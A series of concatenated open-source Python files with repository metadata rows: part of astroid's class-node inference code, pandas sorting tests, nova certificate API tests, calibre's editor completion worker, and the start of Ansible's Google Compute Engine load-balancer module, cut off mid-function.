for anc in self.ancestors(context=context):
if anc.qname() == type_name:
return True
def infer_call_result(self, caller, context=None):
"""infer what a class is returning when called"""
if self.is_subtype_of('%s.type' % (BUILTINS,), context) and len(caller.args) == 3:
name_node = next(caller.args[0].infer(context))
if (isinstance(name_node, Const) and
isinstance(name_node.value, six.string_types)):
name = name_node.value
else:
yield YES
return
result = Class(name, None)
bases = next(caller.args[1].infer(context))
if isinstance(bases, (Tuple, List)):
result.bases = bases.itered()
else:
# There is currently no AST node that can represent an 'unknown'
# node (YES is not an AST node), therefore we simply return YES here
# although we know at least the name of the class.
yield YES
return
result.parent = caller.parent
yield result
else:
yield Instance(self)
def scope_lookup(self, node, name, offset=0):
if any(node == base or base.parent_of(node)
for base in self.bases):
# Handle the case where we have either a name
# in the bases of a class, which exists before
# the actual definition or the case where we have
# a Getattr node, with that name.
#
# name = ...
# class A(name):
# def name(self): ...
#
# import name
# class A(name.Name):
# def name(self): ...
frame = self.parent.frame()
# line offset to avoid that class A(A) resolve the ancestor to
# the defined class
offset = -1
else:
frame = self
return frame._scope_lookup(node, name, offset)
# list of parent class as a list of string (i.e. names as they appear
# in the class definition) XXX bw compat
def basenames(self):
return [bnode.as_string() for bnode in self.bases]
basenames = property(basenames)
def ancestors(self, recurs=True, context=None):
"""return an iterator on the node base classes in a prefixed
depth first order
:param recurs:
boolean indicating if it should recurse or return direct
ancestors only
"""
# FIXME: should be possible to choose the resolution order
# FIXME: inference make infinite loops possible here
yielded = set([self])
if context is None:
context = InferenceContext()
if sys.version_info[0] >= 3:
if not self.bases and self.qname() != 'builtins.object':
yield builtin_lookup("object")[1][0]
return
for stmt in self.bases:
with context.restore_path():
try:
for baseobj in stmt.infer(context):
if not isinstance(baseobj, Class):
if isinstance(baseobj, Instance):
baseobj = baseobj._proxied
else:
# duh ?
continue
if not baseobj.hide:
if baseobj in yielded:
continue # cf xxx above
yielded.add(baseobj)
yield baseobj
if recurs:
for grandpa in baseobj.ancestors(recurs=True,
context=context):
if grandpa is self:
# This class is the ancestor of itself.
break
if grandpa in yielded:
continue # cf xxx above
yielded.add(grandpa)
yield grandpa
except InferenceError:
# XXX log error ?
continue
def local_attr_ancestors(self, name, context=None):
"""return an iterator on astroid representation of parent classes
which have <name> defined in their locals
"""
for astroid in self.ancestors(context=context):
if name in astroid:
yield astroid
def instance_attr_ancestors(self, name, context=None):
"""return an iterator on astroid representation of parent classes
which have <name> defined in their instance attribute dictionary
"""
for astroid in self.ancestors(context=context):
if name in astroid.instance_attrs:
yield astroid
def has_base(self, node):
return node in self.bases
def local_attr(self, name, context=None):
"""return the list of assign node associated to name in this class
locals or in its parents
:raises `NotFoundError`:
if no attribute with this name has been find in this class or
its parent classes
"""
try:
return self.locals[name]
except KeyError:
# get if from the first parent implementing it if any
for class_node in self.local_attr_ancestors(name, context):
return class_node.locals[name]
raise NotFoundError(name)
local_attr = remove_nodes(local_attr, DelAttr)
def instance_attr(self, name, context=None):
"""return the astroid nodes associated to name in this class instance
attributes dictionary and in its parents
:raises `NotFoundError`:
if no attribute with this name has been find in this class or
its parent classes
"""
# Return a copy, so we don't modify self.instance_attrs,
# which could lead to infinite loop.
values = list(self.instance_attrs.get(name, []))
# get all values from parents
for class_node in self.instance_attr_ancestors(name, context):
values += class_node.instance_attrs[name]
if not values:
raise NotFoundError(name)
return values
instance_attr = remove_nodes(instance_attr, DelAttr)
def instanciate_class(self):
"""return Instance of Class node, else return self"""
return Instance(self)
def getattr(self, name, context=None):
"""this method doesn't look in the instance_attrs dictionary since it's
done by an Instance proxy at inference time.
It may return a YES object if the attribute has not been actually
found but a __getattr__ or __getattribute__ method is defined
"""
values = self.locals.get(name, [])
if name in self.special_attributes:
if name == '__module__':
return [cf(self.root().qname())] + values
# FIXME: do we really need the actual list of ancestors?
# returning [Tuple()] + values don't break any test
# this is ticket http://www.logilab.org/ticket/52785
# XXX need proper meta class handling + MRO implementation
if name == '__bases__' or (name == '__mro__' and self.newstyle):
node = Tuple()
node.items = self.ancestors(recurs=True, context=context)
return [node] + values
return std_special_attributes(self, name)
# don't modify the list in self.locals!
values = list(values)
for classnode in self.ancestors(recurs=True, context=context):
values += classnode.locals.get(name, [])
if not values:
raise NotFoundError(name)
return values
def igetattr(self, name, context=None):
"""inferred getattr, need special treatment in class to handle
descriptors
"""
# set lookup name since this is necessary to infer on import nodes for
# instance
context = copy_context(context)
context.lookupname = name
try:
for infered in _infer_stmts(self.getattr(name, context), context,
frame=self):
# yield YES object instead of descriptors when necessary
if not isinstance(infered, Const) and isinstance(infered, Instance):
try:
infered._proxied.getattr('__get__', context)
except NotFoundError:
yield infered
else:
yield YES
else:
yield function_to_method(infered, self)
except NotFoundError:
if not name.startswith('__') and self.has_dynamic_getattr(context):
# class handle some dynamic attributes, return a YES object
yield YES
else:
raise InferenceError(name)
def has_dynamic_getattr(self, context=None):
"""return True if the class has a custom __getattr__ or
__getattribute__ method
"""
# need to explicitly handle optparse.Values (setattr is not detected)
if self.name == 'Values' and self.root().name == 'optparse':
return True
try:
self.getattr('__getattr__', context)
return True
except NotFoundError:
#if self.newstyle: XXX cause an infinite recursion error
try:
getattribute = self.getattr('__getattribute__', context)[0]
if getattribute.root().name != BUILTINS:
# class has a custom __getattribute__ defined
return True
except NotFoundError:
pass
return False
def methods(self):
"""return an iterator on all methods defined in the class and
its ancestors
"""
done = {}
for astroid in chain(iter((self,)), self.ancestors()):
for meth in astroid.mymethods():
if meth.name in done:
continue
done[meth.name] = None
yield meth
def mymethods(self):
"""return an iterator on all methods defined in the class"""
for member in self.values():
if isinstance(member, Function):
yield member
def interfaces(self, herited=True, handler_func=_iface_hdlr):
"""return an iterator on interfaces implemented by the given
class node
"""
# FIXME: what if __implements__ = (MyIFace, MyParent.__implements__)...
try:
implements = Instance(self).getattr('__implements__')[0]
except NotFoundError:
return
if not herited and not implements.frame() is self:
return
found = set()
missing = False
for iface in unpack_infer(implements):
if iface is YES:
missing = True
continue
if not iface in found and handler_func(iface):
found.add(iface)
yield iface
if missing:
raise InferenceError()
_metaclass = None
def _explicit_metaclass(self):
""" Return the explicit defined metaclass
for the current class.
An explicit defined metaclass is defined
either by passing the ``metaclass`` keyword argument
in the class definition line (Python 3) or (Python 2) by
having a ``__metaclass__`` class attribute, or if there are
no explicit bases but there is a global ``__metaclass__`` variable.
"""
for base in self.bases:
try:
for baseobj in base.infer():
if isinstance(baseobj, Class) and baseobj.hide:
self._metaclass = baseobj._metaclass
self._metaclass_hack = True
break
except InferenceError:
pass
if self._metaclass:
# Expects this from Py3k TreeRebuilder
try:
return next(node for node in self._metaclass.infer()
if node is not YES)
except (InferenceError, StopIteration):
return None
if sys.version_info >= (3, ):
return None
if '__metaclass__' in self.locals:
assignment = self.locals['__metaclass__'][-1]
elif self.bases:
return None
elif '__metaclass__' in self.root().locals:
assignments = [ass for ass in self.root().locals['__metaclass__']
if ass.lineno < self.lineno]
if not assignments:
return None
assignment = assignments[-1]
else:
return None
try:
infered = next(assignment.infer())
except InferenceError:
return
if infered is YES: # don't expose this
return None
return infered
def metaclass(self):
""" Return the metaclass of this class.
If this class does not define explicitly a metaclass,
then the first defined metaclass in ancestors will be used
instead.
"""
klass = self._explicit_metaclass()
if klass is None:
for parent in self.ancestors():
klass = parent.metaclass()
if klass is not None:
break
return klass
def has_metaclass_hack(self):
return self._metaclass_hack
def _islots(self):
""" Return an iterator with the inferred slots. """
if '__slots__' not in self.locals:
return
for slots in self.igetattr('__slots__'):
# check if __slots__ is a valid type
for meth in ITER_METHODS:
try:
slots.getattr(meth)
break
except NotFoundError:
continue
else:
continue
if isinstance(slots, Const):
# a string. Ignore the following checks,
# but yield the node, only if it has a value
if slots.value:
yield slots
continue
if not hasattr(slots, 'itered'):
# we can't obtain the values, maybe a .deque?
continue
if isinstance(slots, Dict):
values = [item[0] for item in slots.items]
else:
values = slots.itered()
if values is YES:
continue
for elt in values:
try:
for infered in elt.infer():
if infered is YES:
continue
if (not isinstance(infered, Const) or
not isinstance(infered.value,
six.string_types)):
continue
if not infered.value:
continue
yield infered
except InferenceError:
continue
# Cached, because inferring them all the time is expensive
@cached
def slots(self):
"""Get all the slots for this node.
If the class doesn't define any slot, through `__slots__`
variable, then this function will return a None.
Also, it will return None in the case the slots weren't inferred.
Otherwise, it will return a list of slot names.
"""
if not self.newstyle:
raise NotImplementedError(
"The concept of slots is undefined for old-style classes.")
slots = self._islots()
try:
first = next(slots)
except StopIteration:
# The class doesn't have a __slots__ definition.
return None
return [first] + list(slots)
def _inferred_bases(self, recurs=True, context=None):
# TODO(cpopa): really similar with .ancestors,
# but the difference is when one base is inferred,
# only the first object is wanted. That's because
# we aren't interested in superclasses, as in the following
# example:
#
# class SomeSuperClass(object): pass
# class SomeClass(SomeSuperClass): pass
# class Test(SomeClass): pass
#
# Inferring SomeClass from the Test's bases will give
# us both SomeClass and SomeSuperClass, but we are interested
# only in SomeClass.
if context is None:
context = InferenceContext()
if sys.version_info[0] >= 3:
if not self.bases and self.qname() != 'builtins.object':
yield builtin_lookup("object")[1][0]
return
for stmt in self.bases:
try:
baseobj = next(stmt.infer(context=context))
except InferenceError:
# XXX log error ?
continue
if isinstance(baseobj, Instance):
baseobj = baseobj._proxied
if not isinstance(baseobj, Class):
continue
if not baseobj.hide:
yield baseobj
def mro(self, context=None):
"""Get the method resolution order, using C3 linearization.
It returns the list of ancestors sorted by the mro.
This will raise `NotImplementedError` for old-style classes, since
they don't have the concept of MRO.
"""
if not self.newstyle:
raise NotImplementedError(
"Could not obtain mro for old-style classes.")
bases = list(self._inferred_bases(context=context))
unmerged_mro = ([[self]] +
[base.mro() for base in bases if base is not self] +
[bases])
_verify_duplicates_mro(unmerged_mro)
return _c3_merge(unmerged_mro)
| lgpl-3.0 | -3,886,903,257,581,166,000 | 34.592992 | 90 | 0.558368 | false |
harisbal/pandas | pandas/tests/series/test_sorting.py | 2 | 9605 | # coding=utf-8
import random
import numpy as np
import pytest
from pandas import Categorical, DataFrame, IntervalIndex, MultiIndex, Series
import pandas.util.testing as tm
from pandas.util.testing import assert_almost_equal, assert_series_equal
from .common import TestData
class TestSeriesSorting(TestData):
def test_sort_values(self):
# check indexes are reordered corresponding with the values
ser = Series([3, 2, 4, 1], ['A', 'B', 'C', 'D'])
expected = Series([1, 2, 3, 4], ['D', 'B', 'A', 'C'])
result = ser.sort_values()
tm.assert_series_equal(expected, result)
ts = self.ts.copy()
ts[:5] = np.NaN
vals = ts.values
result = ts.sort_values()
assert np.isnan(result[-5:]).all()
tm.assert_numpy_array_equal(result[:-5].values, np.sort(vals[5:]))
# na_position
result = ts.sort_values(na_position='first')
assert np.isnan(result[:5]).all()
tm.assert_numpy_array_equal(result[5:].values, np.sort(vals[5:]))
# something object-type
ser = Series(['A', 'B'], [1, 2])
# no failure
ser.sort_values()
# ascending=False
ordered = ts.sort_values(ascending=False)
expected = np.sort(ts.dropna().values)[::-1]
assert_almost_equal(expected, ordered.dropna().values)
ordered = ts.sort_values(ascending=False, na_position='first')
assert_almost_equal(expected, ordered.dropna().values)
# ascending=[False] should behave the same as ascending=False
ordered = ts.sort_values(ascending=[False])
expected = ts.sort_values(ascending=False)
assert_series_equal(expected, ordered)
ordered = ts.sort_values(ascending=[False], na_position='first')
expected = ts.sort_values(ascending=False, na_position='first')
assert_series_equal(expected, ordered)
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=None))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[]))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[1, 2, 3]))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending=[False, False]))
pytest.raises(ValueError,
lambda: ts.sort_values(ascending='foobar'))
# inplace=True
ts = self.ts.copy()
ts.sort_values(ascending=False, inplace=True)
tm.assert_series_equal(ts, self.ts.sort_values(ascending=False))
tm.assert_index_equal(ts.index,
self.ts.sort_values(ascending=False).index)
# GH 5856/5853
# Series.sort_values operating on a view
df = DataFrame(np.random.randn(10, 4))
s = df.iloc[:, 0]
def f():
s.sort_values(inplace=True)
pytest.raises(ValueError, f)
def test_sort_index(self):
rindex = list(self.ts.index)
random.shuffle(rindex)
random_order = self.ts.reindex(rindex)
sorted_series = random_order.sort_index()
assert_series_equal(sorted_series, self.ts)
# descending
sorted_series = random_order.sort_index(ascending=False)
assert_series_equal(sorted_series,
self.ts.reindex(self.ts.index[::-1]))
# compat on level
sorted_series = random_order.sort_index(level=0)
assert_series_equal(sorted_series, self.ts)
# compat on axis
sorted_series = random_order.sort_index(axis=0)
assert_series_equal(sorted_series, self.ts)
pytest.raises(ValueError, lambda: random_order.sort_values(axis=1))
sorted_series = random_order.sort_index(level=0, axis=0)
assert_series_equal(sorted_series, self.ts)
pytest.raises(ValueError,
lambda: random_order.sort_index(level=0, axis=1))
def test_sort_index_inplace(self):
# For #11402
rindex = list(self.ts.index)
random.shuffle(rindex)
# descending
random_order = self.ts.reindex(rindex)
result = random_order.sort_index(ascending=False, inplace=True)
assert result is None
tm.assert_series_equal(random_order, self.ts.reindex(
self.ts.index[::-1]))
# ascending
random_order = self.ts.reindex(rindex)
result = random_order.sort_index(ascending=True, inplace=True)
assert result is None
tm.assert_series_equal(random_order, self.ts)
@pytest.mark.parametrize("level", ['A', 0]) # GH 21052
def test_sort_index_multiindex(self, level):
mi = MultiIndex.from_tuples([[1, 1, 3], [1, 1, 1]], names=list('ABC'))
s = Series([1, 2], mi)
backwards = s.iloc[[1, 0]]
# implicit sort_remaining=True
res = s.sort_index(level=level)
assert_series_equal(backwards, res)
# GH13496
# sort has no effect without remaining lvls
res = s.sort_index(level=level, sort_remaining=False)
assert_series_equal(s, res)
def test_sort_index_kind(self):
# GH #14444 & #13589: Add support for sort algo choosing
series = Series(index=[3, 2, 1, 4, 3])
expected_series = Series(index=[1, 2, 3, 3, 4])
index_sorted_series = series.sort_index(kind='mergesort')
assert_series_equal(expected_series, index_sorted_series)
index_sorted_series = series.sort_index(kind='quicksort')
assert_series_equal(expected_series, index_sorted_series)
index_sorted_series = series.sort_index(kind='heapsort')
assert_series_equal(expected_series, index_sorted_series)
def test_sort_index_na_position(self):
series = Series(index=[3, 2, 1, 4, 3, np.nan])
expected_series_first = Series(index=[np.nan, 1, 2, 3, 3, 4])
index_sorted_series = series.sort_index(na_position='first')
assert_series_equal(expected_series_first, index_sorted_series)
expected_series_last = Series(index=[1, 2, 3, 3, 4, np.nan])
index_sorted_series = series.sort_index(na_position='last')
assert_series_equal(expected_series_last, index_sorted_series)
def test_sort_index_intervals(self):
s = Series([np.nan, 1, 2, 3], IntervalIndex.from_arrays(
[0, 1, 2, 3],
[1, 2, 3, 4]))
result = s.sort_index()
expected = s
assert_series_equal(result, expected)
result = s.sort_index(ascending=False)
expected = Series([3, 2, 1, np.nan], IntervalIndex.from_arrays(
[3, 2, 1, 0],
[4, 3, 2, 1]))
assert_series_equal(result, expected)
def test_sort_values_categorical(self):
c = Categorical(["a", "b", "b", "a"], ordered=False)
cat = Series(c.copy())
# sort in the categories order
expected = Series(
Categorical(["a", "a", "b", "b"],
ordered=False), index=[0, 3, 1, 2])
result = cat.sort_values()
tm.assert_series_equal(result, expected)
cat = Series(Categorical(["a", "c", "b", "d"], ordered=True))
res = cat.sort_values()
exp = np.array(["a", "b", "c", "d"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
cat = Series(Categorical(["a", "c", "b", "d"], categories=[
"a", "b", "c", "d"], ordered=True))
res = cat.sort_values()
exp = np.array(["a", "b", "c", "d"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
res = cat.sort_values(ascending=False)
exp = np.array(["d", "c", "b", "a"], dtype=np.object_)
tm.assert_numpy_array_equal(res.__array__(), exp)
raw_cat1 = Categorical(["a", "b", "c", "d"],
categories=["a", "b", "c", "d"], ordered=False)
raw_cat2 = Categorical(["a", "b", "c", "d"],
categories=["d", "c", "b", "a"], ordered=True)
s = ["a", "b", "c", "d"]
df = DataFrame({"unsort": raw_cat1,
"sort": raw_cat2,
"string": s,
"values": [1, 2, 3, 4]})
# Cats must be sorted in a dataframe
res = df.sort_values(by=["string"], ascending=False)
exp = np.array(["d", "c", "b", "a"], dtype=np.object_)
tm.assert_numpy_array_equal(res["sort"].values.__array__(), exp)
assert res["sort"].dtype == "category"
res = df.sort_values(by=["sort"], ascending=False)
exp = df.sort_values(by=["string"], ascending=True)
tm.assert_series_equal(res["values"], exp["values"])
assert res["sort"].dtype == "category"
assert res["unsort"].dtype == "category"
# unordered cat, but we allow this
df.sort_values(by=["unsort"], ascending=False)
# multi-columns sort
# GH 7848
df = DataFrame({"id": [6, 5, 4, 3, 2, 1],
"raw_grade": ['a', 'b', 'b', 'a', 'a', 'e']})
df["grade"] = Categorical(df["raw_grade"], ordered=True)
df['grade'] = df['grade'].cat.set_categories(['b', 'e', 'a'])
# sorts 'grade' according to the order of the categories
result = df.sort_values(by=['grade'])
expected = df.iloc[[1, 2, 5, 0, 3, 4]]
tm.assert_frame_equal(result, expected)
# multi
result = df.sort_values(by=['grade', 'id'])
expected = df.iloc[[2, 1, 5, 4, 3, 0]]
tm.assert_frame_equal(result, expected)
| bsd-3-clause | -8,371,191,273,254,857,000 | 36.084942 | 78 | 0.568246 | false |
citrix-openstack-build/nova | nova/tests/api/openstack/compute/contrib/test_certificates.py | 11 | 2810 | # Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
from nova.api.openstack.compute.contrib import certificates
from nova import context
from nova.openstack.common import rpc
from nova import test
from nova.tests.api.openstack import fakes
def fake_get_root_cert(context, *args, **kwargs):
return 'fakeroot'
def fake_create_cert(context, *args, **kwargs):
return 'fakepk', 'fakecert'
class CertificatesTest(test.NoDBTestCase):
def setUp(self):
super(CertificatesTest, self).setUp()
self.context = context.RequestContext('fake', 'fake')
self.controller = certificates.CertificatesController()
def test_translate_certificate_view(self):
pk, cert = fake_create_cert(self.context)
view = certificates._translate_certificate_view(cert, pk)
self.assertEqual(view['data'], cert)
self.assertEqual(view['private_key'], pk)
def test_certificates_show_root(self):
self.stubs.Set(rpc, 'call', fake_get_root_cert)
req = fakes.HTTPRequest.blank('/v2/fake/os-certificates/root')
res_dict = self.controller.show(req, 'root')
cert = fake_get_root_cert(self.context)
response = {'certificate': {'data': cert, 'private_key': None}}
self.assertEqual(res_dict, response)
def test_certificates_create_certificate(self):
self.stubs.Set(rpc, 'call', fake_create_cert)
req = fakes.HTTPRequest.blank('/v2/fake/os-certificates/')
res_dict = self.controller.create(req)
pk, cert = fake_create_cert(self.context)
response = {'certificate': {'data': cert, 'private_key': pk}}
self.assertEqual(res_dict, response)
class CertificatesSerializerTest(test.NoDBTestCase):
def test_index_serializer(self):
serializer = certificates.CertificateTemplate()
text = serializer.serialize(dict(
certificate=dict(
data='fakecert',
private_key='fakepk'),
))
tree = etree.fromstring(text)
self.assertEqual('certificate', tree.tag)
self.assertEqual('fakepk', tree.get('private_key'))
self.assertEqual('fakecert', tree.get('data'))
| apache-2.0 | -1,903,622,883,617,369,000 | 35.493506 | 78 | 0.672242 | false |
ns950/calibre | src/calibre/gui2/tweak_book/completion/worker.py | 14 | 7340 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
import cPickle, os, sys
from threading import Thread, Event, Lock
from Queue import Queue
from contextlib import closing
from collections import namedtuple
from calibre.constants import iswindows
from calibre.gui2.tweak_book.completion.basic import Request
from calibre.gui2.tweak_book.completion.utils import DataError
from calibre.utils.ipc import eintr_retry_call
COMPLETION_REQUEST = 'completion request'
CLEAR_REQUEST = 'clear request'
class CompletionWorker(Thread):
daemon = True
def __init__(self, result_callback=lambda x:x, worker_entry_point='main'):
Thread.__init__(self)
self.worker_entry_point = worker_entry_point
self.start()
self.main_queue = Queue()
self.result_callback = result_callback
self.reap_thread = None
self.shutting_down = False
self.connected = Event()
self.current_completion_request = None
self.latest_completion_request_id = None
self.request_count = 0
self.lock = Lock()
def launch_worker_process(self):
from calibre.utils.ipc.server import create_listener
from calibre.utils.ipc.pool import start_worker
self.worker_process = p = start_worker(
'from {0} import run_main, {1}; run_main({1})'.format(self.__class__.__module__, self.worker_entry_point))
auth_key = os.urandom(32)
address, self.listener = create_listener(auth_key)
eintr_retry_call(p.stdin.write, cPickle.dumps((address, auth_key), -1))
p.stdin.flush(), p.stdin.close()
self.control_conn = eintr_retry_call(self.listener.accept)
self.data_conn = eintr_retry_call(self.listener.accept)
self.data_thread = t = Thread(name='CWData', target=self.handle_data_requests)
t.daemon = True
t.start()
self.connected.set()
def send(self, data, conn=None):
conn = conn or self.control_conn
try:
eintr_retry_call(conn.send, data)
except:
if not self.shutting_down:
raise
def recv(self, conn=None):
conn = conn or self.control_conn
try:
return eintr_retry_call(conn.recv)
except:
if not self.shutting_down:
raise
def wait_for_connection(self, timeout=None):
self.connected.wait(timeout)
def handle_data_requests(self):
from calibre.gui2.tweak_book.completion.basic import handle_data_request
while True:
try:
req = self.recv(self.data_conn)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
break
if req is None or self.shutting_down:
break
result, tb = handle_data_request(req)
try:
self.send((result, tb), self.data_conn)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
break
def run(self):
self.launch_worker_process()
while True:
obj = self.main_queue.get()
if obj is None:
break
req_type, req_data = obj
try:
if req_type is COMPLETION_REQUEST:
with self.lock:
if self.current_completion_request is not None:
ccr, self.current_completion_request = self.current_completion_request, None
self.send_completion_request(ccr)
elif req_type is CLEAR_REQUEST:
self.send(req_data)
except EOFError:
break
except Exception:
import traceback
traceback.print_exc()
def send_completion_request(self, request):
self.send(request)
result = self.recv()
if result.request_id == self.latest_completion_request_id:
try:
self.result_callback(result)
except Exception:
import traceback
traceback.print_exc()
def clear_caches(self, cache_type=None):
self.main_queue.put((CLEAR_REQUEST, Request(None, 'clear_caches', cache_type, None)))
def queue_completion(self, request_id, completion_type, completion_data, query=None):
with self.lock:
self.current_completion_request = Request(request_id, completion_type, completion_data, query)
self.latest_completion_request_id = self.current_completion_request.id
self.main_queue.put((COMPLETION_REQUEST, None))
def shutdown(self):
self.shutting_down = True
self.main_queue.put(None)
for conn in (getattr(self, 'control_conn', None), getattr(self, 'data_conn', None)):
try:
conn.close()
except Exception:
pass
p = self.worker_process
if p.poll() is None:
self.worker_process.terminate()
t = self.reap_thread = Thread(target=p.wait)
t.daemon = True
t.start()
def join(self, timeout=0.2):
if self.reap_thread is not None:
self.reap_thread.join(timeout)
if not iswindows and self.worker_process.returncode is None:
self.worker_process.kill()
return self.worker_process.returncode
_completion_worker = None
def completion_worker():
global _completion_worker
if _completion_worker is None:
_completion_worker = CompletionWorker()
return _completion_worker
def run_main(func):
from multiprocessing.connection import Client
address, key = cPickle.loads(eintr_retry_call(sys.stdin.read))
with closing(Client(address, authkey=key)) as control_conn, closing(Client(address, authkey=key)) as data_conn:
func(control_conn, data_conn)
Result = namedtuple('Result', 'request_id ans traceback query')
def main(control_conn, data_conn):
from calibre.gui2.tweak_book.completion.basic import handle_control_request
while True:
try:
request = eintr_retry_call(control_conn.recv)
except EOFError:
break
if request is None:
break
try:
ans, tb = handle_control_request(request, data_conn), None
except DataError as err:
ans, tb = None, err.traceback()
except Exception:
import traceback
ans, tb = None, traceback.format_exc()
if request.id is not None:
result = Result(request.id, ans, tb, request.query)
try:
eintr_retry_call(control_conn.send, result)
except EOFError:
break
def test_main(control_conn, data_conn):
obj = control_conn.recv()
control_conn.send(obj)
def test():
w = CompletionWorker(worker_entry_point='test_main')
w.wait_for_connection()
w.send('Hello World!')
print (w.recv())
w.shutdown(), w.join()
| gpl-3.0 | -4,758,162,357,571,931,000 | 34.288462 | 118 | 0.594823 | false |
cloudnull/ansible-modules-core | cloud/google/gce_lb.py | 9 | 12216 | #!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_lb
version_added: "1.5"
short_description: create/destroy GCE load-balancer resources
description:
- This module can create and destroy Google Compute Engine C(loadbalancer)
and C(httphealthcheck) resources. The primary LB resource is the
C(load_balancer) resource and the health check parameters are all
prefixed with I(httphealthcheck).
The full documentation for Google Compute Engine load balancing is at
U(https://developers.google.com/compute/docs/load-balancing/). However,
the ansible module simplifies the configuration by following the
libcloud model.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
httphealthcheck_name:
description:
- the name identifier for the HTTP health check
required: false
default: null
httphealthcheck_port:
description:
- the TCP port to use for HTTP health checking
required: false
default: 80
httphealthcheck_path:
description:
- the url path to use for HTTP health checking
required: false
default: "/"
httphealthcheck_interval:
description:
- the duration in seconds between each health check request
required: false
default: 5
httphealthcheck_timeout:
description:
- the timeout in seconds before a request is considered a failed check
required: false
default: 5
httphealthcheck_unhealthy_count:
description:
- number of consecutive failed checks before marking a node unhealthy
required: false
default: 2
httphealthcheck_healthy_count:
description:
- number of consecutive successful checks before marking a node healthy
required: false
default: 2
httphealthcheck_host:
description:
- host header to pass through on HTTP check requests
required: false
default: null
name:
description:
- name of the load-balancer resource
required: false
default: null
protocol:
description:
- the protocol used for the load-balancer packet forwarding, tcp or udp
required: false
default: "tcp"
choices: ['tcp', 'udp']
region:
description:
- the GCE region where the load-balancer is defined
required: false
external_ip:
description:
- the external static IPv4 (or auto-assigned) address for the LB
required: false
default: null
port_range:
description:
- the port (range) to forward, e.g. 80 or 8000-8888 defaults to all ports
required: false
default: null
members:
description:
- a list of zone/nodename pairs, e.g ['us-central1-a/www-a', ...]
required: false
aliases: ['nodes']
state:
description:
- desired state of the LB
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
requirements:
- "python >= 2.6"
- "apache-libcloud >= 0.13.3"
author: Eric Johnson <[email protected]>
'''
EXAMPLES = '''
# Simple example of creating a new LB, adding members, and a health check
- local_action:
module: gce_lb
name: testlb
region: us-central1
members: ["us-central1-a/www-a", "us-central1-b/www-b"]
httphealthcheck_name: hc
httphealthcheck_port: 80
httphealthcheck_path: "/up"
'''
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
from libcloud.loadbalancer.types import Provider as Provider_lb
from libcloud.loadbalancer.providers import get_driver as get_driver_lb
from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
ResourceExistsError, ResourceNotFoundError
_ = Provider.GCE
HAS_LIBCLOUD = True
except ImportError:
HAS_LIBCLOUD = False
def main():
module = AnsibleModule(
argument_spec = dict(
httphealthcheck_name = dict(),
httphealthcheck_port = dict(default=80),
httphealthcheck_path = dict(default='/'),
httphealthcheck_interval = dict(default=5),
httphealthcheck_timeout = dict(default=5),
httphealthcheck_unhealthy_count = dict(default=2),
httphealthcheck_healthy_count = dict(default=2),
httphealthcheck_host = dict(),
name = dict(),
protocol = dict(default='tcp'),
region = dict(),
external_ip = dict(),
port_range = dict(),
members = dict(type='list'),
state = dict(default='present'),
service_account_email = dict(),
pem_file = dict(),
project_id = dict(),
)
)
if not HAS_LIBCLOUD:
module.fail_json(msg='libcloud with GCE support (0.13.3+) required for this module.')
gce = gce_connect(module)
httphealthcheck_name = module.params.get('httphealthcheck_name')
httphealthcheck_port = module.params.get('httphealthcheck_port')
httphealthcheck_path = module.params.get('httphealthcheck_path')
httphealthcheck_interval = module.params.get('httphealthcheck_interval')
httphealthcheck_timeout = module.params.get('httphealthcheck_timeout')
httphealthcheck_unhealthy_count = \
module.params.get('httphealthcheck_unhealthy_count')
httphealthcheck_healthy_count = \
module.params.get('httphealthcheck_healthy_count')
httphealthcheck_host = module.params.get('httphealthcheck_host')
name = module.params.get('name')
protocol = module.params.get('protocol')
region = module.params.get('region')
external_ip = module.params.get('external_ip')
port_range = module.params.get('port_range')
members = module.params.get('members')
state = module.params.get('state')
try:
gcelb = get_driver_lb(Provider_lb.GCE)(gce_driver=gce)
gcelb.connection.user_agent_append("%s/%s" % (
USER_AGENT_PRODUCT, USER_AGENT_VERSION))
except Exception, e:
module.fail_json(msg=unexpected_error_msg(e), changed=False)
changed = False
json_output = {'name': name, 'state': state}
if not name and not httphealthcheck_name:
module.fail_json(msg='Nothing to do, please specify a "name" ' + \
'or "httphealthcheck_name" parameter', changed=False)
if state in ['active', 'present']:
# first, create the httphealthcheck if requested
hc = None
if httphealthcheck_name:
json_output['httphealthcheck_name'] = httphealthcheck_name
try:
hc = gcelb.ex_create_healthcheck(httphealthcheck_name,
host=httphealthcheck_host, path=httphealthcheck_path,
port=httphealthcheck_port,
